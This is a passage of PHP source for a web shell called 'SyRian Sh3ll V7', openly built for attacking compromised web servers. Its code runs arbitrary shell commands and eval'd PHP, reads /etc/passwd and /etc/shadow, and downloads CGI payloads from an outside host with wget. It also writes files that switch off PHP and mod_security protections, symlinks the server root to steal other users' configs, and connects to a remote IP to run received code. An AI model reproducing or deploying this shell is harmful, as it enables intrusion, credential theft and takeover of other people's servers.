  853. if ($uselogin ==1)
  854. {
  855.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
  856.     {
  857.         if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
  858.         {
  859.             print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
  860.         }
  861.         else
  862.         {
  863.             if($_POST['usrname'])
  864.             {
  865.                 print'<script>alert("Go and play in the street man !!");</script>';
  866.             }
  867.             echo '
  868.             <body bgcolor="black"><br><br>
  869.             <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
  870.  
  871.             <img src="http://www.syrian-shell.com/eagle.jpg">
  872.             </center>
  873.             <div align="center">
  874.             <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
  875.             <input dir="ltr" name="usrname" value="userName" type="text"  size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
  876.             <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
  877.             <input type="submit" value=" Login  " name="login" />
  878.             </form></p>';
  879.             exit;
  880.         }
  881.     }
  882. }
  883. # ---------------------------------------#
  884. #               Some Info                #
  885. #----------------------------------------#
  886. $dir = getcwd();
  887. $uname= @php_uname();
  888. if(strlen($dir)>1 && $dir[1]==":")
  889. $os = "Windows";
  890. else $os = "Linux";
  891. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  892. $server = @substr($SERVER_SOFTWARE,0,120);
  893.  
  894. echo "
  895. <body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
  896. <p dir=ltr>&nbsp;&nbsp;</p>
  897. <div dir=ltr align=center><font size=4><b>
  898. <img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93>&nbsp;</b></font><div
  899. dir=ltr align=center><span style=height: 25px;><b>
  900. <font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color: #990000><p></p></span></span></div></td><td
  901. bgcolor=#000000>
  902. <p dir=ltr><font  size=1>&nbsp; <b>[<a href=?id=mainPage>Main</a>]</b></span>
  903. <font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
  904. <b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
  905. <b>[</span><a href=?id=about>About</a>]</b></span>
  906. <b>[</span><a href=?id=logout>Logout</a>]</b></span>
  907. <b>[</span><a href=?id=100>SuiCide</a>]</b></span>
  908. <br>
  909. <font size=1><br>
  910. &nbsp;   Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
  911. &nbsp;   System = <sy>".$os."</sy>
  912. &nbsp;   Magic_Quotes = <sy>". @magicQouts()." </sy>
  913. &nbsp;   Curl = <sy>".@Curl()." </sy>
  914. &nbsp;   Register Globals = <sy>".@RegisterGlobals()." </sy>
  915. &nbsp;   Open Basedir = <sy>".@openBaseDir()." </sy>
  916. <br>
  917. &nbsp;   Gzip = <sy>".@Gzip()."</sy>
  918. &nbsp;   MySQLI = <sy>".@MysqlI()." </sy>
  919. &nbsp;   MSQL = <sy>".@MSQL()."</sy>
  920. &nbsp;   SQL Lite = <sy>".@SQlLite()."</sy>
  921. &nbsp;   Usefull Locals = <sy>".rootxpL()." </sy>
  922. <br>
  923. &nbsp;   Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
  924. &nbsp;   Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
  925. &nbsp;   PHP Version = <sy>".@phpversion()." </sy>
  926. &nbsp;   Zend Version = <sy>".@zend_version()." </sy>
  927. &nbsp;   MySQL Version = <sy>".@mysql_get_server_info()." </sy>
  928. <br>
  929. &nbsp;   MySQL = ".MySQL2()."
  930. &nbsp;   MsSQL = ".MsSQL()."
  931. &nbsp;   PostgreSQL = ".PostgreSQL()."
  932. &nbsp;   Oracle = ".Oracle()."
  933. &nbsp;   Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
  934. &nbsp;   Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
  935. <br>
  936. &nbsp;   Dis_Functions = <sy>". DisableFunctions()." </sy><br>
  937. &nbsp;   Your IP = <sy>".GetRealIP()." </sy>
  938. &nbsp;   Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])." </sy></a>
  939. [</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
  940. &nbsp;   Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
  941. &nbsp;  
  942. [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  943. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  944. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  945. <br>
  946. <br>
  947. <table bgcolor=#cccccc width=\"100%\"><tbody><tr>
  948. <td align=right width=100><p dir=ltr>
  949. <sy>&nbsp;&nbsp;Server :&nbsp;&nbsp; <br>
  950. <b>uname -a : &nbsp;
  951. <br>pwd : </span>&nbsp;<br>ID : </span>&nbsp;<br></b></sy></td><td>
  952. <p dir=ltr><font color=#cccccc size=-2><b> &nbsp;&nbsp;".$server."
  953. <br>&nbsp;&nbsp;".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br>&nbsp;&nbsp;".$dir."<br>&nbsp;&nbsp;".Exe('id')."</b>
  954. </font></td></tr></tbody>
  955. </table>
  956. &nbsp;&nbsp;[<a href='#down'>Down</a>]
  957. [<a href='javascript:window.print()'>Print</a>]
  958. </table>";
  959.  
  960. # ---------------------------------------#
  961. #                Main Page               #
  962. #----------------------------------------#
  963. if ($_GET['id']== 'mainPage')
  964. {
  965.     echo "<form method='post'><table width=100% border=1><tr><td>
  966.     <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
  967.  
  968.     if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
  969.     {
  970.         @chdir($_POST['directory']);
  971.         if($os == "Windows")
  972.         {
  973.             echo Exe('dir');
  974.         }
  975.         else if($os == "Linux")
  976.         {
  977.             echo Exe('ls');
  978.         }
  979.     }
  980.     else if($_POST['submitCommands']) // Execute The Alias Command .
  981.         {
  982.             echo Exe($_POST['alias']);
  983.         }
  984.     else if($_POST['Execute']) // Execute The Command From Command Line  .
  985.         {
  986.             @chdir($_POST['directory']);
  987.             if(empty($_POST['cmd']))
  988.             {
  989.                 if($os == "Windows")
  990.                 {
  991.                     echo Exe('dir');
  992.                 }
  993.                 else if($os == "Linux")
  994.                 {
  995.                     echo Exe('ls -lia');
  996.                 }
  997.             }
  998.             else
  999.             {
  1000.                 echo Exe($_POST['cmd']);
  1001.             }
  1002.         }
  1003.         else if($_POST['submitEval']) // Execute Eval Code .
  1004.         {
  1005.             $eval = @str_replace("<?php","",$_POST['php_eval']);
  1006.             $eval = @str_replace("<?php","",$eval);
  1007.             $eval = @str_replace("?>","",$eval);
  1008.             $eval = @str_replace("\\","",$eval);
  1009.             echo eval($eval);
  1010.         }
  1011.         # --------------------------
  1012.         #   Hash Analyzer        
  1013.         #---------------------------
  1014.         else if($_POST['analyzieNow'])
  1015.         {
  1016.             $hash = $_POST['hashToAnalyze'];
  1017.             $subHash = substr($hash,0,3);
  1018.             if($subHash =='$ap' && strlen($hash) == 37)
  1019.             {
  1020.                 echo "The Hash : ".$hash." is : MD5(APR) Hash";
  1021.             }
  1022.             else if($subHash =='$1$' && strlen($hash) == 34)
  1023.             {
  1024.                 echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  1025.             }
  1026.             else if($subHash =='$H$' && strlen($hash) == 35)
  1027.             {
  1028.                 echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  1029.             }
  1030.             else if(strlen($hash) == 29)
  1031.             {
  1032.                 echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  1033.             }
  1034.             else if($subHash =='$5$' && strlen($hash) == 64)
  1035.             {
  1036.                 echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  1037.             }
  1038.             else if($subHash =='$6$' && strlen($hash) == 128)
  1039.             {
  1040.                 echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  1041.             }
  1042.             else if(strlen($hash) == 56)
  1043.             {
  1044.                 echo "The Hash : ".$hash." is : SHA224 Hash";
  1045.                 }
  1046.             else if(strlen($hash) == 64)
  1047.             {
  1048.                 echo "The Hash : ".$hash." is : SHA256 Hash";
  1049.                 }
  1050.             else if(strlen($hash) == 96)
  1051.             {
  1052.                 echo "The Hash : ".$hash." is : SHA384 Hash";
  1053.             }
  1054.             else if(strlen($hash) == 128)
  1055.             {
  1056.                 echo "The Hash : ".$hash." is : SHA512 Hash";
  1057.             }
  1058.             else if(strlen($hash) == 40)
  1059.             {
  1060.                 echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  1061.             }
  1062.             else if(strlen($hash) == 16)
  1063.             {
  1064.                 echo "The Hash : ".$hash." is : MySQL Hash";
  1065.             }
  1066.             else if(strlen($hash) == 13)
  1067.             {
  1068.                 echo "The Hash : ".$hash." is : DES(Unix) Hash";
  1069.             }
  1070.             else if(strlen($hash) == 32)
  1071.             {
  1072.                 echo "The Hash : ".$hash." is : MD5 Hash";
  1073.             }
  1074.             else if(strlen($hash) == 4)
  1075.             {
  1076.                 echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  1077.             else
  1078.             {
  1079.                 echo "Error : Can't Detect Hash Type";
  1080.             }
  1081.         }
  1082.         # --------------------------
  1083.         #  Show Users    
  1084.         #---------------------------
  1085.         else if($_POST['showUsers'])
  1086.         {
  1087.             function showUsers()
  1088.             {
  1089.  
  1090.                 if($rows = Exe('cat /etc/passwd'))
  1091.                 {
  1092.                     echo $rows;
  1093.                 }
  1094.                 elseif($rows= Exe('cat /etc/domainalias'))
  1095.                 {
  1096.                     echo $rows;
  1097.                 }
  1098.                 elseif($rows= Exe('cat /etc/shadow'))
  1099.                 {
  1100.                     echo $rows;
  1101.                 }
  1102.                 elseif($rows= Exe('cat /var/mail'))
  1103.                 {
  1104.                     echo $rows;
  1105.                 }
  1106.                 elseif($rows= Exe('cat /etc/valiases'))
  1107.                 {
  1108.                     echo $rows;
  1109.                 }
  1110.                 else { echo "[-] Can't Show Users :( ... Sorry ";}
  1111.             }
  1112.             showUsers();
  1113.         }
  1114.         # --------------------------
  1115.         #   Generate perl      
  1116.         #---------------------------
  1117.         else if($_POST['generatePel'])
  1118.         {
  1119.             @chdir($_POST["cgiperlPath"]);
  1120.             @mkdir("cgi", 0755);
  1121.             @chdir("cgi");
  1122.             Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
  1123.             Exe('unzip cgiPerl.sy3.zip');
  1124.             @unlink('cgiPerl.sy3.zip');
  1125.             @chmod("cgiPerl.sy3",0755);
  1126.             @chmod("compiler",0777);
  1127.             $cgi_h = fopen('.htaccess','w+');
  1128.             @fwrite($cgi_h,'AddHandler cgi-script .sy3');
  1129.             echo '
  1130. cgi.sy3 & .htaccess Has Been Created in [ cgi ]  Directory
  1131. Password Is : sy34' ;
  1132.         }
  1133.         # --------------------------
  1134.         #   Generate Server  
  1135.         #---------------------------
  1136.         else if($_POST['generateSER'])
  1137.         {
  1138.             @chdir($_POST['ShourtCutPath']);
  1139.             @mkdir("allserver", 0755);
  1140.             @chdir("allserver");
  1141.             Exe("ln -s / allserver");
  1142.             GenerateFile(".htaccess","
  1143.             Options Indexes FollowSymLinks
  1144.             DirectoryIndex ssssss.htm
  1145.             AddType txt .php
  1146.             AddHandler txt .php");
  1147.             echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
  1148.         }
  1149.         # --------------------------
  1150.         #   Change Mode
  1151.         #---------------------------
  1152.         else if($_POST['changePermission'])
  1153.         {
  1154.             $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
  1155.             if($ch_ok)
  1156.             echo "Permission Changed Successfully ! " ;
  1157.             else echo "Changing Is Not Allowed Or The File is not Exist !";
  1158.         }
  1159.         # --------------------------
  1160.         #   Generate Users
  1161.         #---------------------------
  1162.         else if($_POST['GenerateUsers'])
  1163.         {
  1164.             @chdir($_POST['usersPath']);
  1165.             @mkdir("users", 0755);
  1166.             @chdir('users');
  1167.             Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
  1168.             Exe('mv users.rar users.sy3');
  1169.             @chmod('users.sy3',0755 );
  1170.             $user_h = fopen('.htaccess','w+');
  1171.             fwrite($user_h,'AddHandler cgi-script .sy3');
  1172.             echo "users.sy3 & .htaccess Has Been Created in [ users ]  Directory" ;
  1173.         }
  1174.         # --------------------------
  1175.         #   Forbidden
  1176.         #---------------------------
  1177.         else if($_POST['generateForbidden'])
  1178.         {
  1179.             @chdir($_POST['forbiddenPath']);
  1180.             @mkdir('forbidden');
  1181.             @chdir('forbidden');
  1182.             $htaccess = fopen('.htaccess','w+');
  1183.             if($_POST['403'] == 'DirectoryIndex')
  1184.             {
  1185.                 fwrite($htaccess,"DirectoryIndex in.txt");
  1186.             }
  1187.             elseif($_POST['403'] == 'HeaderName')
  1188.             {
  1189.                 fwrite($htaccess,"HeaderName in.txt");
  1190.             }
  1191.             elseif($_POST['403'] == 'TXT')
  1192.             {
  1193.                 fwrite($htaccess,"
  1194.                 Options Indexes FollowSymLinks
  1195.                 addType txt .php
  1196.                 AddHandler txt .php");
  1197.             }
  1198.             elseif($_POST['403'] == '404')
  1199.             {
  1200.                 fwrite($htaccess,"
  1201.                 ErrorDocument 404 /404.html
  1202.                 404.html = Symlinked in.txt  ");
  1203.             }
  1204.             elseif($_POST['403'] == 'ReadmeName')
  1205.             {
  1206.                 fwrite($htaccess,"ReadmeName in.txt");
  1207.             }
  1208.             elseif($_POST['403'] == 'footerName')
  1209.             {
  1210.                 fwrite($htaccess,"footerName in.txt");
  1211.             }
  1212.             echo "
  1213. Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
  1214. EX : ln -s /home/user/public_html/config.php in.txt";
  1215.         }
  1216.         # --------------------------
  1217.         #   Upload Files
  1218.         #---------------------------
  1219.         else if($_POST['UploadNow'])
  1220.         {
  1221.             $nbr_uploaded =0;
  1222.             $files_uploded = array();
  1223.             $path= '';
  1224.             $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
  1225.             for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
  1226.             {
  1227.                 if($_FILES['uploadfile']['name'][$i] != '')
  1228.                 {
  1229.                     move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
  1230.                     $files_uploded[] = $_FILES['uploadfile']['name'][$i];
  1231.                     $nbr_uploaded++;
  1232.                     echo "The File  ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
  1233. ";
  1234.                 }
  1235.                 else "The File  ".basename($_FILES['uploadfile']['name'][$i])."  Can't Be Upload :( !";
  1236.             }
  1237.         }
  1238.         # --------------------------
  1239.         #   no Security
  1240.         #---------------------------
  1241.         else if($_POST['phpiniGenerate'])
  1242.         {
  1243.             GenerateFile("php.ini","
  1244.             safe_mode = Off
  1245.             disable_functions = NONE
  1246.             safe_mode_gid = OFF
  1247.             open_basedir = OFF");
  1248.             echo "php.ini Has Been Generated Successfully";
  1249.         }
  1250.         else if($_POST['htaccessGenerate'])
  1251.         {
  1252.             GenerateFile(".htaccess","
  1253.             <IfModule mod_security.c>
  1254.             SecFilterEngine Off
  1255.             SecFilterScanPOST Off
  1256.             SecFilterCheckURLEncoding Off
  1257.             SecFilterCheckCookieFormat Off
  1258.             SecFilterCheckUnicodeEncoding Off
  1259.             SecFilterNormalizeCookies Off
  1260.             </IfModule>
  1261.             SetEnv PHPRC ".getcwd()."php.ini
  1262.             suPHP_ConfigPath ".getcwd()."php.ini
  1263.             ");
  1264.             echo ".htaccess Has Been Generated Successfully ";
  1265.         }
  1266.         else if($_POST['iniphpGenerate'])
  1267.         {
  1268.             GenerateFile("ini.php","
  1269.             ini_restore(\"safe_mode\");
  1270.             ini_restore(\"open_basedir\");
  1271.             ");
  1272.             echo "ini.php Has Been Generated Successfully";
  1273.         }
  1274.         # --------------------------
  1275.         #  Reading Files
  1276.         #---------------------------
  1277.         else if($_POST['read'] || $_POST['show'])
  1278.         {
  1279.             $file = $_POST['file'];
  1280.             $file = str_replace('\\\\','\\',$file);
  1281.            
  1282.                 if($_POST['read'])
  1283.                 {
  1284.                     $openMyFile = fopen($file,'r');
  1285.                     if(function_exists('fread'))
  1286.                     {
  1287.                         echo fread($openMyFile,100000);
  1288.                     }
  1289.                     elseif(function_exists('fgets'))
  1290.                     {
  1291.                         echo fgets($openMyFile);
  1292.                     }
  1293.                     elseif(function_exists('readfile'))
  1294.                     {
  1295.                         echo readfile($openMyFile);
  1296.                     }
  1297.                     elseif(function_exists('file_get_contents'))
  1298.                     {
  1299.                         $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
  1300.                         var_dump($readMyFile);
  1301.                     }
  1302.                     elseif(function_exists('file'))
  1303.                     {
  1304.                         $readMyFile = file($myFile);
  1305.                         foreach ($readMyFile as $line_num => $readMyFileLine)
  1306.                         {
  1307.                             echo "Line #$line_num : " . $readMyFileLine . "
  1308.                             ";
  1309.                         }
  1310.                     }
  1311.                     elseif(Exe("'cat ".$file."'"))
  1312.                     {
  1313.                         echo Exe("'cat ".$file."'");   
  1314.                     }
  1315.                 elseif(function_exists('readfile'))
  1316.                 {
  1317.                     readfile($file);
  1318.                 }
  1319.                 elseif(function_exists('include'))
  1320.                 {
  1321.                     include($file);
  1322.                 }
  1323.                 elseif(function_exists('copy'))
  1324.                 {
  1325.                     $tmp=tempnam('','cx');
  1326.                     copy('compress.zlib://'.$file,$tmp);
  1327.                     $fh=fopen($tmp,'r');
  1328.                     $data=fread($fh,filesize($tmp));
  1329.                     fclose($fh);
  1330.                     echo $data;
  1331.                 }
  1332.                 elseif(function_exists('mb_send_mail'))
  1333.                 {
  1334.                     if(file_exists('/tmp/mb_send_mail'))
  1335.                     {
  1336.                         unlink('/tmp/mb_send_mail');
  1337.                     }
  1338.                     @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
  1339.                     @readfile('/tmp/mb_send_mail');
  1340.                 }
  1341.                 else if(function_exists('curl_init'))
  1342.                 {
  1343.                     $fh=curl_init('file://'.$file.'');
  1344.                     $tmp=curl_exec($fh);
  1345.                     echo $tmp;
  1346.                     if(strstr($file,DIRECTORY_SEPARATOR))
  1347.                     $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
  1348.                     else $ch=curl_init('file://'.$file."\x00".__FILE__);
  1349.                     var_dump(curl_exec($ch));
  1350.                 }
  1351.                 else if(is_writable('.'))
  1352.                 {
  1353.                     file_put_contents('php.ini','safe_mode = Off');
  1354.                     readfile($file);
  1355.                     unlink('php.ini');
  1356.                 }
  1357.                 else if(is_object($ws=new COM('WScript.Shell')))
  1358.                 {
  1359.                     echo $exec=comshelL("type \"$file\"",$ws);
  1360.                 }
  1361.                 else if(checkfunctioN('win_shell_execute'))
  1362.                 {
  1363.                     echo winshelL("type \"$file\"");
  1364.                 }
  1365.                 else if(checkfunctioN('win32_create_service'))
  1366.                 {
  1367.                     echo srvshelL("type \"$file\"");
  1368.                 }
  1369.                 else if(function_exists('imap_open'))
  1370.                 {
  1371.                     $str=imap_open('/etc/passwd','','');
  1372.                     $list=imap_list($str,$file,'*');
  1373.                     for($i=0;$i<count($list);$i++)
  1374.                     {
  1375.                         echo $list[$i]."\n";
  1376.                     }
  1377.                     imap_close($str);
  1378.                     $str=imap_open($file,'','');
  1379.                     $tmp=imap_body($str,1);
  1380.                     echo $tmp;
  1381.                     imap_close($str);
  1382.                 }
  1383.                 elseif($file == '/etc/passwd')
  1384.                 {
  1385.                     for($uid=0;$uid<99999;$uid++)
  1386.                     {
  1387.                         $h=posix_getpwuid($uid);
  1388.                         if(!empty($h))
  1389.                         foreach($h as $v)
  1390.                         echo "$v:";
  1391.                         echo "\r\n";
  1392.                     }
  1393.                 }
  1394.                 fclose($openMyFile);
  1395.             }
  1396.             elseif($_POST['show'])
  1397.             {
  1398.                 $con=glob("$file*");
  1399.                 foreach ($con as $v)
  1400.                 {
  1401.                     echo "$v\n";
  1402.                 }
  1403.                 if(function_exists('imap_open'))
  1404.                 {
  1405.                     $str=imap_open('/etc/passwd','','');
  1406.                     $s=explode("|",$file);
  1407.                     if(count($s)>1)
  1408.                     {
  1409.                         $list=imap_list($str,trim($s[0]),trim($s[1]));
  1410.                     }
  1411.                     else
  1412.                     {
  1413.                         $list=imap_list($str,trim($str[0]),'*');
  1414.                     }
  1415.                     for($i=0;$i<count($list);$i++)
  1416.                     {
  1417.                         imap_close($str);
  1418.                     }
  1419.                 }
  1420.                 else if(is_object($ws=new COM('WScript.Shell')))
  1421.                 {
  1422.                     $exec=comshelL("dir \"$file\"",$ws);
  1423.                     $exec=str_replace("\t",'',$exec);
  1424.                     echo $exec;
  1425.                 }
  1426.                 else if(checkfunctioN('win_shell_execute'))
  1427.                 {
  1428.                     echo winshelL("dir \"$file\"");
  1429.                 }
  1430.                 else if(checkfunctioN('win32_create_service'))
  1431.                 {
  1432.                     echo srvshelL("dir \"$file\"");
  1433.                 }
  1434.             }
  1435.            
  1436.         }
  1437.         # --------------------------
  1438.         #   Encryption
  1439.         #---------------------------
  1440.         elseif($_POST['encryptNow'])
  1441.         {
  1442.             if(!empty($_POST['ENCRYPTION']))
  1443.             {
  1444.                 $md5 = $_POST['ENCRYPTION'];
  1445.                 echo "
  1446. MD5             : ".md5($md5)."
  1447. Base64 Encode       : ".base64_encode($md5)."
  1448. Base64 Decode       : ".base64_decode($md5)."
  1449. Crypt           : ".crypt($md5)."
  1450. SHA1            : ".sha1($md5)."
  1451. MD4             : ".hash("md4",$md5)."
  1452. SHA256          : ".hash("sha256",$md5)."
  1453. URL Encoding        : ".urlencode($md5)."
  1454. URL Decoding        : ".str_hex($md5)."
  1455. CRC32           : ".crc32($md5)."
  1456. Length          : ".strlen($md5)."";
  1457.             }
  1458.             else
  1459.             {
  1460.                 echo "Please Put At Least One Char !";
  1461.             }
  1462.         }
  1463.         # --------------------------
  1464.         #   Metasploit RC
  1465.         #---------------------------
  1466.         else if($_POST['metaConnect'])
  1467.         {
  1468.             $ip = $_POST['ip'];
  1469.             $port = $_POST['port'];
  1470.             if ($ip == "" && $port == "")
  1471.             {
  1472.                 echo "Please fill IP Adress & The listen Port";
  1473.             }
  1474.             else
  1475.             {
  1476.                 $ipaddr = $ip;
  1477.                 $port = $port;
  1478.                 if (FALSE !== strpos($ipaddr, ":"))
  1479.                 {
  1480.                     $ipaddr = "[". $ipaddr ."]";
  1481.                 }
  1482.                 if (is_callable('stream_socket_client'))
  1483.                 {
  1484.                     $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
  1485.                     if (!$msgsock)
  1486.                     {
  1487.                         die();
  1488.                     }
  1489.                     $msgsock_type = 'stream';
  1490.                 }
  1491.                 elseif (is_callable('fsockopen'))
  1492.                 {
  1493.                     $msgsock = fsockopen($ipaddr,$port);
  1494.                     if (!$msgsock)
  1495.                     {
  1496.                         die();
  1497.                     }
  1498.                     $msgsock_type = 'stream';
  1499.                 }
  1500.                 elseif (is_callable('socket_create'))
  1501.                 {
  1502.                     $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1503.                     $res = socket_connect($msgsock, $ipaddr, $port);
  1504.                     if (!$res)
  1505.                     {
  1506.                         die();
  1507.                     }
  1508.                     $msgsock_type = 'socket';
  1509.                 }
  1510.                 else
  1511.                 {
  1512.                     die();
  1513.                 }
  1514.                 switch ($msgsock_type)
  1515.                 {
  1516.                     case 'stream': $len = fread($msgsock, 4); break;
  1517.                     case 'socket': $len = socket_read($msgsock, 4); break;
  1518.                 }
  1519.                 if (!$len)
  1520.                 {
  1521.                     die();
  1522.                 }
  1523.                 $a = unpack("Nlen", $len);
  1524.                 $len = $a['len'];
  1525.                 $buffer = '';
  1526.                 while (strlen($buffer) < $len)
  1527.                 {
  1528.                     switch ($msgsock_type)
  1529.                     {
  1530.                         case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
  1531.                         break;
  1532.                         case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
  1533.                         break;
  1534.                     }
  1535.                 }
  1536.                 eval($buffer);
  1537.                 echo "[*] Connection Terminated";
  1538.                 die();
  1539.             }
  1540.         }
  1541.         # --------------------------
  1542.         #  Scan Ports
  1543.         #---------------------------
  1544.         else if($_POST['submitDomainToScanPort'])
  1545.         {
  1546.             $domainToScan = $_POST['domainToScanPort'];
  1547.             if(!$domainToScan)
  1548.             {
  1549.                 echo "[-] Enter IP Address Or Domain To Scan";
  1550.             }
  1551.             else
  1552.             {
  1553.                 for($i=0;$i<1024;$i++)
  1554.                 {
  1555.                     $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
  1556.                     if($fp)
  1557.                     {
  1558.                         echo "[+] port " . $i . " open on " . $domainToScan . "
  1559. ";
  1560.                     }
  1561.                     else
  1562.                     {
  1563.                         echo "[+] port " . $i . " closed on " . $domainToScan . "
  1564. ";
  1565.                     }
  1566.                     flush();
  1567.                 }
  1568.                 fclose($fp);
  1569.             }
  1570.         }
  1571.            
  1572.             if (isset($_POST["submit_lol"]))
  1573.             {
  1574.                 set_time_limit(0);
  1575.                 $url = $_POST['hash_lol'];
  1576.                 echo "Testing ".$url."\n";
  1577.                 $extention = $_POST['extention'];
  1578.                 $adminlocales = array(
  1579. "admin/",
  1580. "wp-admin/",
  1581. "administration/",
  1582. "administrator/",
  1583. "moderator/",
  1584. "webadmin/",
  1585. "adminarea/",
  1586. "bb-admin/",
  1587. "adminLogin/",
  1588. "admin_area/",
  1589. "panel-administracion/",
  1590. "instadmin/",
  1591. "memberadmin/",
  1592. "administratorlogin/",
  1593. "adm/",
  1594. "siteadmin/login".$extention."",
  1595. "admin/account".$extention."",
  1596. "admin/index".$extention."",
  1597. "admin/login".$extention."",
  1598. "admin/admin".$extention."",
  1599. "admin_area/login".$extention."",
  1600. "admin_area/index".$extention."",
  1601. "admincp/index".$extention."",
  1602. "adminpanel".$extention."",
  1603. "webadmin".$extention."",
  1604. "webadmin/index".$extention."",
  1605. "webadmin/login".$extention."",
  1606. "admin/admin_login".$extention."",
  1607. "admin_login".$extention."",
  1608. "panel-administracion/login".$extention."",
  1609. "admin_area/admin".$extention."",
  1610. "bb-admin/index".$extention."",
  1611. "bb-admin/login".$extention."",
  1612. "bb-admin/admin".$extention."",
  1613. "admin/home".$extention."",
  1614. "pages/admin/admin-login".$extention."",
  1615. "admin/admin-login".$extention."",
  1616. "admin-login".$extention."",
  1617. "admin/adminLogin".$extention."",
  1618. "home".$extention."",
  1619. "adminarea/index".$extention."",
  1620. "admin/controlpanel".$extention."",
  1621. "admin".$extention."",
  1622. "admin/cp".$extention."",
  1623. "cp".$extention."",
  1624. "adminpanel.php",
  1625. "moderator".$extention."",
  1626. "administrator/index".$extention."",
  1627. "administrator/login".$extention."",
  1628. "user".$extention."",
  1629. "administrator/account".$extention."",
  1630. "administrator".$extention."",
  1631. "login".$extention."",
  1632. "modelsearch/login".$extention."",
  1633. "moderator/login".$extention."",
  1634. "panel-administracion/admin".$extention."",
  1635. "admincontrol/login".$extention."",
  1636. "adm/index".$extention."",
  1637. "moderator/admin".$extention."",
  1638. "account".$extention."",
  1639. "controlpanel".$extention."",
  1640. "admincontrol".$extention."",
  1641. "webadmin/admin".$extention."",
  1642. "adminLogin".$extention."",
  1643. "panel-administracion/login".$extention."",
  1644. "wp-login".$extention."",
  1645. "adminLogin".$extention."",
  1646. "admin/adminLogin".$extention."",
  1647. "adminarea/index".$extention."",
  1648. "adminarea/admin".$extention."",
  1649. "adminarea/login".$extention."",
  1650. "panel-administracion/index".$extention."",
  1651. "modelsearch/index".$extention."",
  1652. "modelsearch/admin".$extention."",
  1653. "adm/admloginuser".$extention."",
  1654. "admloginuser".$extention."",
  1655. "admin2".$extention."",
  1656. "admin2/login".$extention."",
  1657. "admin2/index".$extention."",
  1658. "adm/index".$extention."",
  1659. "adm".$extention."",
  1660. "affiliate".$extention."",
  1661. "adm_auth".$extention."",
  1662. "memberadmin".$extention."",
  1663. "administratorlogin".$extention."");
  1664.                 foreach ($adminlocales as $admin)
  1665.                 {
  1666.                     $headers = @get_headers("$url$admin");
  1667.                     if (@eregi('200', $headers[0]))
  1668.                     {
  1669.                         echo "[+] $url$admin  ~ Found!\n";
  1670.                     }
  1671.                    
  1672.                 }
  1673.             }
  1674.         # --------------------------
  1675.         #   Config Finder
  1676.         #---------------------------
  1677.         else if($_POST['configFinderSubmit'])
  1678.         {
  1679.             set_time_limit(0);
  1680.             $passwd=fopen('/etc/passwd','r');
  1681.             if (!$passwd)
  1682.             {
  1683.                 echo "[-] Error : coudn't read /etc/passwd";
  1684.                 exit;
  1685.             }
  1686.             $path_to_public=array();
  1687.             $users=array();
  1688.             $pathtoconf=array();
  1689.             $i=0;
  1690.             while(!feof($passwd))
  1691.             {
  1692.                 $str=fgets($passwd);
  1693.                 if ($i>35)
  1694.                 {
